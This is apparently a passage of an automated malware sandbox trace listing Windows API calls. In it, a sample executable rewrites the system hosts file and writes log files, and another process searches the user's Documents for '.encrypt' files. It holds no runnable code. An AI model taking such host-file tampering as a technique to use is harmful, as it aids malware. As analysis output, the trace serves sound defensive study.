"BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 165 os_tid = 0x13c8 [0224.258] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0224.265] RoInitialize () returned 0x1 [0224.267] RoUninitialize () returned 0x0 [0231.109] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x6fea30 | out: phkResult=0x6fea30*=0x0) returned 0x2 [0231.111] RegCloseKey (hKey=0x80000002) returned 0x0 [0231.123] GetFullPathNameW (in: lpFileName="desktop.ini", nBufferLength=0x105, lpBuffer=0x6fecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", lpFilePart=0x0) returned 0x23 [0231.565] CoTaskMemAlloc (cb=0x20c) returned 0xac93e8 [0231.566] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0xac93e8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0231.581] CoTaskMemFree (pv=0xac93e8) [0231.600] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x105, lpBuffer=0x6fec78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0231.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ff234) returned 1 [0231.612] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Documents", nBufferLength=0x105, lpBuffer=0x6fece8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Documents", lpFilePart=0x0) returned 0x21 [0231.617] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Documents\\*.encrypt", lpFindFileData=0x6fef5c | out: lpFindFileData=0x6fef5c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0231.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ff1f8) returned 1 [0232.021] EtwEventRegister (in: ProviderId=0x24274d0, EnableCallback=0x49f05be, CallbackContext=0x0, RegHandle=0x24274ac | out: RegHandle=0x24274ac) returned 0x0 [0232.369] GetFullPathNameW (in: lpFileName="diamond.log", nBufferLength=0x105, lpBuffer=0x6febb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\diamond.log", lpFilePart=0x0) returned 0x23 [0232.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ff068) returned 1 [0232.370] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\diamond.log" (normalized: "c:\\users\\fd1hvy\\desktop\\diamond.log"), fInfoLevelId=0x0, lpFileInformation=0x6ff0e4 | out: lpFileInformation=0x6ff0e4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0234.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ff064) returned 1 [0234.611] GetFullPathNameW (in: lpFileName="diamond.log", nBufferLength=0x105, lpBuffer=0x6fea84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\diamond.log", lpFilePart=0x0) returned 0x23 [0234.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fefc8) returned 1 [0234.613] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\diamond.log" (normalized: "c:\\users\\fd1hvy\\desktop\\diamond.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338 [0234.696] GetFileType (hFile=0x338) returned 0x1 [0234.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fefc4) returned 1 [0234.696] GetFileType (hFile=0x338) returned 0x1 [0234.702] GetTimeZoneInformation (in: lpTimeZoneInformation=0x6fef2c | out: lpTimeZoneInformation=0x6fef2c) returned 0x1 [0234.708] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x6fed88 | out: pTimeZoneInformation=0x6fed88) returned 0x1 [0234.723] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x6fee6c | out: phkResult=0x6fee6c*=0x350) returned 0x0 [0234.724] RegQueryValueExW (in: hKey=0x350, lpValueName="TZI", lpReserved=0x0, lpType=0x6fee88, lpData=0x0, lpcbData=0x6fee84*=0x0 | out: lpType=0x6fee88*=0x3, lpData=0x0, lpcbData=0x6fee84*=0x2c) returned 0x0 [0234.725] RegQueryValueExW (in: hKey=0x350, lpValueName="TZI", lpReserved=0x0, lpType=0x6fee88, lpData=0x242b4ac, lpcbData=0x6fee84*=0x2c | out: lpType=0x6fee88*=0x3, lpData=0x242b4ac*, lpcbData=0x6fee84*=0x2c) returned 0x0 [0234.726] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x6fecc0 | out: phkResult=0x6fecc0*=0x0) returned 0x2 [0234.729] RegQueryValueExW (in: hKey=0x350, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x6fee60, lpData=0x0, lpcbData=0x6fee5c*=0x0 | out: lpType=0x6fee60*=0x1, lpData=0x0, lpcbData=0x6fee5c*=0x20) returned 0x0 [0234.730] RegQueryValueExW (in: hKey=0x350, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x6fee60, lpData=0x242b8d0, lpcbData=0x6fee5c*=0x20 | out: lpType=0x6fee60*=0x1, lpData="@tzres.dll,-320", lpcbData=0x6fee5c*=0x20) returned 0x0 [0234.730] RegQueryValueExW (in: hKey=0x350, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x6fee60, lpData=0x0, lpcbData=0x6fee5c*=0x0 | out: lpType=0x6fee60*=0x1, lpData=0x0, lpcbData=0x6fee5c*=0x20) returned 0x0 [0234.730] RegQueryValueExW (in: hKey=0x350, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x6fee60, lpData=0x242b928, lpcbData=0x6fee5c*=0x20 | out: lpType=0x6fee60*=0x1, lpData="@tzres.dll,-322", lpcbData=0x6fee5c*=0x20) returned 0x0 [0234.730] RegQueryValueExW (in: hKey=0x350, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x6fee60, lpData=0x0, lpcbData=0x6fee5c*=0x0 | out: lpType=0x6fee60*=0x1, lpData=0x0, lpcbData=0x6fee5c*=0x20) returned 0x0 [0234.730] RegQueryValueExW (in: hKey=0x350, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x6fee60, lpData=0x242b980, lpcbData=0x6fee5c*=0x20 | out: lpType=0x6fee60*=0x1, lpData="@tzres.dll,-321", lpcbData=0x6fee5c*=0x20) returned 0x0 [0234.734] CoTaskMemAlloc (cb=0x20c) returned 0xad3ad8 [0234.734] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xad3ad8 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0235.035] CoTaskMemFree (pv=0xad3ad8) [0235.036] CoTaskMemAlloc (cb=0x20c) returned 0xad3ad8 [0235.036] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x6fee7c, pwszFileMUIPath=0xad3ad8, pcchFileMUIPath=0x6fee80, pululEnumerator=0x6fee74 | out: pwszLanguage=0x0, pcchLanguage=0x6fee7c, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x6fee80, pululEnumerator=0x6fee74) returned 1 [0235.040] CoTaskMemFree (pv=0x0) [0235.040] CoTaskMemFree (pv=0xad3ad8) [0235.041] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x9e0001 [0235.044] CoTaskMemAlloc (cb=0x3ec) returned 0xad3ad8 [0235.044] LoadStringW (in: hInstance=0x9e0001, uID=0x140, lpBuffer=0xad3ad8, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0235.045] CoTaskMemFree (pv=0xad3ad8) [0235.045] FreeLibrary (hLibModule=0x9e0001) returned 1 [0235.046] CoTaskMemAlloc (cb=0x20c) returned 0xad3ad8 [0235.046] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xad3ad8 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0235.046] CoTaskMemFree (pv=0xad3ad8) [0235.046] CoTaskMemAlloc (cb=0x20c) returned 0xad3ad8 [0235.046] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x6fee7c, pwszFileMUIPath=0xad3ad8, pcchFileMUIPath=0x6fee80, pululEnumerator=0x6fee74 | out: pwszLanguage=0x0, pcchLanguage=0x6fee7c, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x6fee80, pululEnumerator=0x6fee74) returned 1 [0235.047] CoTaskMemFree (pv=0x0) [0235.047] CoTaskMemFree (pv=0xad3ad8) [0235.048] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x9e0001 [0235.049] CoTaskMemAlloc (cb=0x3ec) returned 0xad3ad8 [0235.049] LoadStringW (in: hInstance=0x9e0001, uID=0x142, lpBuffer=0xad3ad8, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0235.050] CoTaskMemFree (pv=0xad3ad8) [0235.050] FreeLibrary (hLibModule=0x9e0001) returned 1 [0235.051] CoTaskMemAlloc (cb=0x20c) returned 0xad3ad8 [0235.051] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xad3ad8 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0235.051] CoTaskMemFree (pv=0xad3ad8) [0235.051] CoTaskMemAlloc (cb=0x20c) returned 0xad3ad8 [0235.051] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x6fee7c, pwszFileMUIPath=0xad3ad8, pcchFileMUIPath=0x6fee80, pululEnumerator=0x6fee74 | out: pwszLanguage=0x0, pcchLanguage=0x6fee7c, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x6fee80, pululEnumerator=0x6fee74) returned 1 [0235.052] CoTaskMemFree (pv=0x0) [0235.052] CoTaskMemFree (pv=0xad3ad8) [0235.052] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x9e0001 [0235.054] CoTaskMemAlloc (cb=0x3ec) returned 0xad3ad8 [0235.054] LoadStringW (in: hInstance=0x9e0001, uID=0x141, lpBuffer=0xad3ad8, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0235.054] CoTaskMemFree (pv=0xad3ad8) [0235.054] FreeLibrary (hLibModule=0x9e0001) returned 1 [0235.055] RegCloseKey (hKey=0x350) returned 0x0 [0235.686] WriteFile (in: hFile=0x338, lpBuffer=0x243282c*, nNumberOfBytesToWrite=0x6f, lpNumberOfBytesWritten=0x6ff06c, lpOverlapped=0x0 | out: lpBuffer=0x243282c*, lpNumberOfBytesWritten=0x6ff06c*=0x6f, lpOverlapped=0x0) returned 1 [0235.699] CloseHandle (hObject=0x338) returned 1 [0236.068] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3d8 [0236.068] WriteFile (in: hFile=0x3d8, lpBuffer=0x6ff0b4*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x6ff0b8, lpOverlapped=0x0 | out: lpBuffer=0x6ff0b4*, lpNumberOfBytesWritten=0x6ff0b8*=0x0, lpOverlapped=0x0) returned 1 [0236.079] GetFileType (hFile=0x3d8) returned 0x3 [0236.082] WriteFile (in: hFile=0x3d8, lpBuffer=0x2433e44*, nNumberOfBytesToWrite=0x57, lpNumberOfBytesWritten=0x6ff094, lpOverlapped=0x0 | out: lpBuffer=0x2433e44*, lpNumberOfBytesWritten=0x6ff094*=0x57, lpOverlapped=0x0) returned 1 [0236.086] CoGetContextToken (in: pToken=0x6ffc20 | out: pToken=0x6ffc20) returned 0x0 [0236.087] CObjectContext::QueryInterface () returned 0x0 [0236.087] CObjectContext::GetCurrentThreadType () returned 0x0 [0236.087] Release () returned 0x0 [0236.090] CoGetContextToken (in: pToken=0x6ff924 | out: pToken=0x6ff924) returned 0x0 [0236.090] CObjectContext::QueryInterface () returned 0x0 [0236.090] CObjectContext::GetCurrentThreadType () returned 0x0 [0236.090] Release () returned 0x0 [0236.094] CoGetContextToken (in: pToken=0x6ff924 | out: pToken=0x6ff924) returned 0x0 [0236.094] CObjectContext::QueryInterface () returned 0x0 [0236.094] CObjectContext::GetCurrentThreadType () returned 0x0 [0236.094] Release () returned 0x0 [0236.703] CoGetContextToken (in: pToken=0x6ff924 | out: pToken=0x6ff924) returned 0x0 [0236.703] CObjectContext::QueryInterface () returned 0x0 [0236.703] CObjectContext::GetCurrentThreadType () returned 0x0 [0236.704] Release () returned 0x0 [0236.713] CoGetContextToken (in: pToken=0x6ff944 | out: pToken=0x6ff944) returned 0x0 [0236.713] CObjectContext::QueryInterface () returned 0x0 [0236.713] CObjectContext::GetCurrentThreadType () returned 0x0 [0236.713] Release () returned 0x0 [0236.715] CoUninitialize () Thread: id = 177 os_tid = 0x11a8 Thread: id = 179 os_tid = 0x1194 Thread: id = 181 os_tid = 0x1214 [0224.274] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0224.274] RoInitialize () returned 0x1 [0224.274] RoUninitialize () returned 0x0 [0236.093] EtwEventUnregister (RegHandle=0xad14c8) returned 0x0 [0236.698] RegCloseKey (hKey=0x80000004) returned 0x0 [0236.699] CloseHandle (hObject=0x338) returned 1 [0236.700] UnmapViewOfFile (lpBaseAddress=0x9e0000) returned 1 [0236.713] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Process: id = "18" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4baba000" os_pid = "0x590" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x244" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000f160" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 166 os_tid = 0xa7c Thread: id = 167 os_tid = 0x9a0 Thread: id = 168 os_tid = 0x99c Thread: id = 169 os_tid = 0x98c Thread: id = 170 os_tid = 0x674 Thread: id = 171 os_tid = 0x66c Thread: id = 172 os_tid = 0x5e8 Thread: id = 173 os_tid = 0x5e4 Thread: id = 174 os_tid = 0x5e0 Thread: id = 175 os_tid = 0x594 Process: id = "19" image_name = "onc2pn4u4214.exe" filename = "c:\\users\\fd1hvy\\desktop\\onc2pn4u4214.exe" page_root = "0x21716000" os_pid = "0xd6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0xfac" cmd_line = "onc2pn4u4214.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 176 os_tid = 0x4ec [0224.189] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0224.199] RoInitialize () returned 0x1 [0224.200] RoUninitialize () returned 0x0 [0231.297] CoTaskMemAlloc (cb=0x20c) returned 0x13aa078 [0231.297] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x13aa078 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0231.307] CoTaskMemFree (pv=0x13aa078) [0231.416] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x116e6b8 | out: phkResult=0x116e6b8*=0x0) returned 0x2 [0231.417] RegCloseKey (hKey=0x80000002) returned 0x0 [0231.435] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x105, lpBuffer=0x116e910, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0231.444] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\drivers\\etc\\hosts", nBufferLength=0x105, lpBuffer=0x116e870, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\drivers\\etc\\hosts", lpFilePart=0x0) returned 0x25 [0231.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116edb4) returned 1 [0231.451] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\drivers\\etc\\hosts" (normalized: "c:\\windows\\system32\\drivers\\etc\\hosts"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xe4 [0231.453] GetFileType (hFile=0xe4) returned 0x1 [0231.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116edb0) returned 1 [0231.453] GetFileType (hFile=0xe4) returned 0x1 [0231.454] ReadFile (in: hFile=0xe4, lpBuffer=0x319600c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x116ee5c, lpOverlapped=0x0 | out: lpBuffer=0x319600c*, lpNumberOfBytesRead=0x116ee5c*=0x338, lpOverlapped=0x0) returned 1 [0231.456] ReadFile (in: hFile=0xe4, lpBuffer=0x319600c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x116ee5c, lpOverlapped=0x0 | out: lpBuffer=0x319600c*, lpNumberOfBytesRead=0x116ee5c*=0x0, lpOverlapped=0x0) returned 1 [0231.457] CloseHandle (hObject=0xe4) returned 1 [0231.622] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\drivers\\etc\\hosts", nBufferLength=0x105, lpBuffer=0x116e854, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\drivers\\etc\\hosts", lpFilePart=0x0) returned 0x25 [0231.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116ed98) returned 1 [0231.622] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\drivers\\etc\\hosts" (normalized: "c:\\windows\\system32\\drivers\\etc\\hosts"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xe4 [0231.940] GetFileType (hFile=0xe4) returned 0x1 [0231.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116ed94) returned 1 [0231.941] GetFileType (hFile=0xe4) returned 0x1 [0231.945] WriteFile (in: hFile=0xe4, lpBuffer=0x3199690*, nNumberOfBytesToWrite=0x338, lpNumberOfBytesWritten=0x116ee14, lpOverlapped=0x0 | out: lpBuffer=0x3199690*, lpNumberOfBytesWritten=0x116ee14*=0x338, lpOverlapped=0x0) returned 1 [0231.950] CloseHandle (hObject=0xe4) returned 1 [0232.290] GetFullPathNameW (in: lpFileName="ruby.log", nBufferLength=0x105, lpBuffer=0x116e914, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ruby.log", lpFilePart=0x0) returned 0x20 [0232.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116edc8) returned 1 [0232.291] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ruby.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ruby.log"), fInfoLevelId=0x0, lpFileInformation=0x116ee44 | out: lpFileInformation=0x116ee44*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0232.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116edc4) returned 1 [0232.292] GetFullPathNameW (in: lpFileName="ruby.log", nBufferLength=0x105, lpBuffer=0x116e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ruby.log", lpFilePart=0x0) returned 0x20 [0232.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116ed28) returned 1 [0232.292] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ruby.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ruby.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xe4 [0234.737] GetFileType (hFile=0xe4) returned 0x1 [0234.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116ed24) returned 1 [0234.738] GetFileType (hFile=0xe4) returned 0x1 [0234.743] GetTimeZoneInformation (in: lpTimeZoneInformation=0x116ec8c | out: lpTimeZoneInformation=0x116ec8c) returned 0x1 [0234.747] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x116eae8 | out: pTimeZoneInformation=0x116eae8) returned 0x1 [0234.762] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x116ebcc | out: phkResult=0x116ebcc*=0x344) returned 0x0 [0234.763] RegQueryValueExW (in: hKey=0x344, lpValueName="TZI", lpReserved=0x0, lpType=0x116ebe8, lpData=0x0, lpcbData=0x116ebe4*=0x0 | out: lpType=0x116ebe8*=0x3, lpData=0x0, lpcbData=0x116ebe4*=0x2c) returned 0x0 [0234.764] RegQueryValueExW (in: hKey=0x344, lpValueName="TZI", lpReserved=0x0, lpType=0x116ebe8, lpData=0x319caa0, lpcbData=0x116ebe4*=0x2c | out: lpType=0x116ebe8*=0x3, lpData=0x319caa0*, lpcbData=0x116ebe4*=0x2c) returned 0x0 [0234.765] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x116ea20 | out: phkResult=0x116ea20*=0x0) returned 0x2 [0234.768] RegQueryValueExW (in: hKey=0x344, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x116ebc0, lpData=0x0, lpcbData=0x116ebbc*=0x0 | out: lpType=0x116ebc0*=0x1, lpData=0x0, lpcbData=0x116ebbc*=0x20) returned 0x0 [0234.769] RegQueryValueExW (in: hKey=0x344, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x116ebc0, lpData=0x319cfac, lpcbData=0x116ebbc*=0x20 | out: lpType=0x116ebc0*=0x1, lpData="@tzres.dll,-320", lpcbData=0x116ebbc*=0x20) returned 0x0 [0234.769] RegQueryValueExW (in: hKey=0x344, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x116ebc0, lpData=0x0, lpcbData=0x116ebbc*=0x0 | out: lpType=0x116ebc0*=0x1, lpData=0x0, lpcbData=0x116ebbc*=0x20) returned 0x0 [0234.769] RegQueryValueExW (in: hKey=0x344, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x116ebc0, lpData=0x319d004, lpcbData=0x116ebbc*=0x20 | out: lpType=0x116ebc0*=0x1, lpData="@tzres.dll,-322", lpcbData=0x116ebbc*=0x20) returned 0x0 [0234.769] RegQueryValueExW (in: hKey=0x344, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x116ebc0, lpData=0x0, lpcbData=0x116ebbc*=0x0 | out: lpType=0x116ebc0*=0x1, lpData=0x0, lpcbData=0x116ebbc*=0x20) returned 0x0 [0234.769] RegQueryValueExW (in: hKey=0x344, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x116ebc0, lpData=0x319d05c, lpcbData=0x116ebbc*=0x20 | out: lpType=0x116ebc0*=0x1, lpData="@tzres.dll,-321", lpcbData=0x116ebbc*=0x20) returned 0x0 [0234.774] CoTaskMemAlloc (cb=0x20c) returned 0x13aa078 [0234.774] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x13aa078 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0234.774] CoTaskMemFree (pv=0x13aa078) [0234.775] CoTaskMemAlloc (cb=0x20c) returned 0x13aa078 [0234.775] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x116ebdc, pwszFileMUIPath=0x13aa078, pcchFileMUIPath=0x116ebe0, pululEnumerator=0x116ebd4 | out: pwszLanguage=0x0, pcchLanguage=0x116ebdc, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x116ebe0, pululEnumerator=0x116ebd4) returned 1 [0234.778] CoTaskMemFree (pv=0x0) [0234.778] CoTaskMemFree (pv=0x13aa078) [0234.780] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x1520001 [0235.081] CoTaskMemAlloc (cb=0x3ec) returned 0x13b31f8 [0235.081] LoadStringW (in: hInstance=0x1520001, uID=0x140, lpBuffer=0x13b31f8, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0235.082] CoTaskMemFree (pv=0x13b31f8) [0235.083] FreeLibrary (hLibModule=0x1520001) returned 1 [0235.084] CoTaskMemAlloc (cb=0x20c) returned 0x13aa078 [0235.084] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x13aa078 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0235.084] CoTaskMemFree (pv=0x13aa078) [0235.084] CoTaskMemAlloc (cb=0x20c) returned 0x13aa078 [0235.084] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x116ebdc, pwszFileMUIPath=0x13aa078, pcchFileMUIPath=0x116ebe0, pululEnumerator=0x116ebd4 | out: pwszLanguage=0x0, pcchLanguage=0x116ebdc, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x116ebe0, pululEnumerator=0x116ebd4) returned 1 [0235.085] CoTaskMemFree (pv=0x0) [0235.085] CoTaskMemFree (pv=0x13aa078) [0235.085] 